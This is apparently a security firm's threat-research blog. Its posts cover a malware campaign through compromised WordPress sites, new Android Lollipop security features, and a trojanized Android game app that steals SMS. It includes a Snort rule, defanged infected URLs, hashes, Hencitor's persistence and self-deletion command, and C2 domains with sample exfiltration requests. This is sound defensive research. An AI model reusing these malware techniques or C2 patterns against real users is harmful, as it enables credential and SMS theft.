Sunday, December 21, 2014

Compromised Wordpress sites serving multiple malware payloads

During our daily log monitoring process, we observe many interesting threat events. One such event led to a compromised WordPress site campaign, which was found to serve multiple malware families including Upatre/Hencitor/Extrat Xtreme RAT/Vawtrak. The URLs which were serving malware were found to adhere to a particular pattern. Infected WordPress sites observed, included URLs with "/1.php?r”. Emerging Threats (ET) had previously released a Snort signature for this campaign on 12/08/2014. Since then, we have been continuously monitoring the activities related to it. The following is the snort signature released by ET.
 
Snort Signature
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
CURRENT_EVENTS Probable malicious download from e-mail link /1.php";
flow:established,to_server; urilen:8; content:"/1.php?r"; http_uri;
content:!"Referer|3a 20|"; http_header;
flowbits:set,et.exploitkitlanding; classtype:bad-unknown; sid:2019894;
rev:1;)

Below are the compromised websites observed, which have been found to be serving multiple malware families.

Compromised wordpress websites
airlessspraysupplies[.]com/wp-includes/1[.]php?r
altero[.]be/1[.]php?r
alzina[.]cat/1[.]php?r
angeladoesfood[.]com/wp-admin/1[.]php?r
apsmiles[.]com/wp-content/themes/rfx/1[.]php?r
architecture[.]web[.]auth[.]gr/1[.]php?r
augustgifford[.]com/wp-admin/1[.]php?r
bankruptcy-software[.]com/wp-content/themes/classic/1[.]php?r
bernie[.]jshall[.]net/wp-content/themes/twentytwelve/1[.]php?r
beta[.]pescariusports[.]ro/images/1[.]php?r
blackwellanddenton[.]com/components/com_contact/1[.]php?r
blog[,]longboardsicecream[.]com/wp-content/plugins/1[.]php?r
blog[.]ridici-jednotky[.]cz/wp-content/plugins/simple4us/1[.]php?r
blog[.]topdealslondon[.]com/wp-content/uploads/1[.]php?r
cartorioalbuquerque[.]com[.]br/images/1[.]php?r
climatechange[.]mobi/images/1[.]php?r
core[.]is/1[.]php?r
couponshare[.]me/1[.]php?r
dannygill[.]co[.]uk/wp-content/plugins/simple4us/1[.]php?r
dlaciebie[.]org/wp-admin/1[.]php?r
geototal[.]az/en/ru/engine/editor/scripts/common/codemirror/mode/xml/1[.]php?r
kba1f9684c70[.]nazwa[.]pl/images/1[.]php?r
linkleads[.]vn/1[.]php?r
lionel[.]my/wp-content/plugins/akismet/1[.]php?r
livedoor[.]eu/1[.]php?r
ludovicharollais[.]org/wp-admin/1[.]php?r
m11[.]mobi/images/1[.]php?r
matthewkarant[.]com/wp-content/themes/twentynine/1[.]php?r
mcymbethel[.]com[.]ar/modules/mod_ariimageslider/1[.]php?r
merklab[.]eu/1[.]php?r
mitoyotaseagarrota[.]com/components/com_banners/1[.]php?r
mlmassagetherapy[.]com[.]au/wp-content/uploads/1[.]php?r
monitoring[.]sensomedia[.]hu/1[.]php?r
newwww[.]r11mis[.]be/images/1[.]php?r
odelia-coaching[.]co[.]il/wp-content/plugins/google-sitemap-generator/1[.]php?r
odelia-coaching[.]co[.]il/wp-content/plugins/google-sitemap-generator/1[.]php?r
osp[.]ruszow[.]liu[.]pl/images/1[.]php?r
pms[.]isovn[.]net/images/1[.]php?r
prodvizhenie-sajta[.]com/images/1[.]php?r
redmine[.]sensomedia[.]hu/1[.]php?r
salihajszalon[.]hu/1[.]php?r
sonicboommusic[.]com[.]au/components/com_banners/1[.]php?r
sparkledesign[.]ro/1[.]php?r
thebestcookbooks[.]co[.]uk/wp-content/plugins/1[.]php?r
thefoodstudio[.]co[.]nz/wp-content/themes/food-cook/1[.]php?r
thietkekientruca4[.]vn/1[.]php?r
treasurething[.]com/wp-includes/pomo/1[.]php?r
tsv-penzberg[.]de/wp-admin/1[.]php?r
turbomarketingteam[.]com/1[.]php?r
tusengangerstarkare[.]ingelaclarin[.]se/wp-admin/1[.]php?r
twobyones[.]com/1[.]php?r
xhmeiastokyma[.]gr/1[.]php?r
youreverlastingmemories[.]co[.]uk/1[.]php?r

These compromised WordPress sites may have been used by Exploit Kit (EK) authors as drop sites for serving malware. Another potential attack vector could involve email spam.
The following table shows different types of malware we have seen dropped from the aforementioned compromised sites. All malware was found to be zipped.
 
ZIP MD5ZIPFILE NAME
2f225283c66032c9f7dcb44f42697246fax_20141204_385.pdf.zip
6696527bfda97b1473d1047117ded8d6invoice.pdf.zip
93babef06bfd93bcbb5065c445fb57d4label_08122014_23.pdf.zip
bea9be813bb7df579d5be3e4543dc6a4payment_details9427923.pdf.zip
1159fe7ec4d0b2cfde57dfb28b98f0c9ePackage_12092014_42.pdf.zip
038710b2029046c39ca4082e2c34f9b3wav_voice20141208.zip
ec35acdbe331c73e5e6883ebc08f896dpayment_invoice_182734.pdf.zip
8f00cfdf067b01462670212ba5874cdbpdf_efax_9823612397.zip

Lets take a look at the files after unzipping them. All of the files are Windows screen savers and include fake icons of legitimate software packages, to persuade the victims to click on them.

Downloaded files:


For this post we've chosen to focus on the Hencitor malware. Hencitor’s typical behavior is to download additional malware onto the victim’s machine and execute it. 

MD5: 6bb3b23ff3e736d499775120aa8d6ae2
VT Score: 9/56 (At the time of analysis)

Lets take a look at some important things noted while conducting dynamic analysis of this malware.
  • Copies itself to 
    • "C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe”
  • Creates autostart registry key entry
    • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
      • "winlogin” = "C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe”
  • Uses ping.exe to check the status of other devices and networks.
    • cmd /D /R ping -n 10 localhost && del C:\payment_invoice_182734.pdf.scr.exe && start /B C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe && exit
  • Creates a thread in following existing process on the system.
    • C:\Windows\explorer.exe
    • C:\Windows\System32\sppsvc.exe
    • C:\Windows\System32\wbem\WmiPrvSE.exe
    • C:\Windows\System32\conhost.exe
  • Deletes itself after installation 
    • c:\payment_invoice_182734.pdf.scr.exe
  • Malware seen to resolve couple of suspicious tor sites. 
    • o3qz25zwu4or5mak.tor2web[.]org 
    • o3qz25zwu4or5mak.tor2web[.]ru 
Conclusion:
Compromising vulnerable WordPress sites to spread malware has become one of the more widely used attack vectors by EK’s and email spam campaigns. Such campaigns generally drop variants of well known malware families,  which are undetected by the AV vendors. By the time of analysis we observed poor detection rates for the malware samples involved in this campaign.

-Stay Safe

Top Security Features Added to Android Lollipop

As Google officially rolls out it's new operating system Lollipop, let's review some of the enhanced security features added to Android 5.0.

Lollipop
Kill switch
The most interesting new security feature is the Factory Reset Protection option, which is also known as the “kill switch.” To aid corporate and personal users dealing with stolen devices, the personal data stored within the device can now be remotely wiped and the phone made inoperable. With reports suggesting that over 3 million Americans had their smart phones stolen last year, it's easy to see why Google has added this feature to Lollipop.
Device management.
Encryption on the fly
Another valuable security feature available in Lollipop is default encryption. Although not an entirely new feature as previous Android did offer encryption, it needed to be explicitly enabled by the user. With Lollipop, the initial boot will prompt users to activate encryption. Thereafter, new data will be encrypted on the fly.

Improved malware protection and sandboxing
Lollipop is armed with SELinux (Security Enhanced Linux), which aims to provide enhanced protection against malware and vulnerabilities. This feature ensures secure app isolation, which helps to keep private data secure should the device be compromised. 

Smart Device Lock
The real privacy danger for most users is simply leaving a device unlocked and then having someone else gain access to personal data and open social profiles. Locking phone features should not be a tedious task that users avoid. Lollipop therefore introduces a new feature called Smart Lock to help combat this problem.

Smart Lock adds the ability to set trusted locations such as home or the office, where your device will open automatically once you enter that region. You can do the same in conjunction with specific Bluetooth and NFC enabled Android Wear smart watches. When sensing these trusted devices, Lollipop phones/tablets will lower their security shields as the owner is presumably present. Users are also able to set notification access prior to a security lock to allow actions such as sending a message.

Multiple User Profiles
As Internet social profiles and personal data like photos and contacts are generally the most sensitive information for a user, lending a phone to another person creates a security risk. Lollipop solves this issue by permitting multiple user profiles. Users can create a different guest profile which has limited access. The Owner account has access to the entire device and everything within it, as well as control over other profiles on the device. A User account, on the other hand, has limited access to certain apps and content controlled by the device’s main user, as well as limited calling and SMS capabilities. This feature is also beneficial for parents who can give their phone to their kids and only grant them access to a specific app or a game that they want them to play and nothing else on the device.

Want to scan Android apps for security and privacy issues? Try ZAP.

Thursday, December 11, 2014

Trojanized and Pirated Assassins Creed app

During our daily research, we recently came across Android malware disguising itself as an Assassins Creed app, which is a popular paid gaming application. The malware in question will install a pirated version of the Assassins Creed game that functions normally, making end user oblivious to the malicious activities it performs in background.

Application information:

Permissions:
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.GET_ACCOUNTS
  • android.permission.INTERNET
  • android.permission.PROCESS_OUTGOING_CALLS
  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_SMS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.WAKE_LOCK
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.WRITE_SMS
The malicious application is capable of sending multi-part text messages, harvesting text messages from a victim's device, and sending stolen information to a remote Command & Control (C2) server. We were able to locate phone numbers belonging to Russian bank "Volga-Vyatka Bank of Sberbank of Russia" in the malicious application code for which SMS messages are being intercepted to steal sensitive information. Another interesting feature we saw is the usage of AES encryption for all the C2 communication. It also harvests the mobile number and Subscriber ID information from the victim device for tracking purposes.

The screenshot below shows the AES crypto library configurations. All the sensitive harvested data and C2 communication is encrypted and decrypted using this configuration.



Code snippet showing the string containing the Russian Bank phone numbers:



Command and Control server information in encrypted and decrypted form:



We saw the following two command and control servers hardcoded in the malicious application:
  •  bnk7ihekqxp.net
  •  googleapiserver.net


The screenshot above shows the usage of AES for C2 communication. A sample call back request from the infected device will be of the following format:

"http://bnk7ihekqxp[.]net/iaefu.php?1=4fe08eb4b43XXXXXXXX&id=X".

The code snippet below shows the SMS and Subscriber ID information harvesting feature:


It sends the harvested information via a POST request as seen below:


Code snippet showing the SMS sending feature:


Code snippet showing the SMS interception and storage arrays:
.

The intercepted SMS data, Subscriber ID, and phone number information are then sent to the C2 server in an encrypted form
.

Here is a sample request:
http://googleapiserver.net/kysnfhwo.php?1=4fe08eXXXXXXXXXXXXXXXXXXXX&4=3XXXXXXXXXXXXXXX

The malicious app performs the activity of harvesting sensitive information and sending it to the remote server on a regular interval by setting up an alarm as seen below:


Upon installation, the user will see the game icon on the screen, that disappears shortly thereafter with the malicious process still running in the background.

Recommendation:

Cybercriminals often lure users with pirated versions of popular paid mobile applications that are Trojanized to steal sensitive information. It is strongly recommended that users stay away from such offers and download mobile app only from the trusted sources like the Google Play store.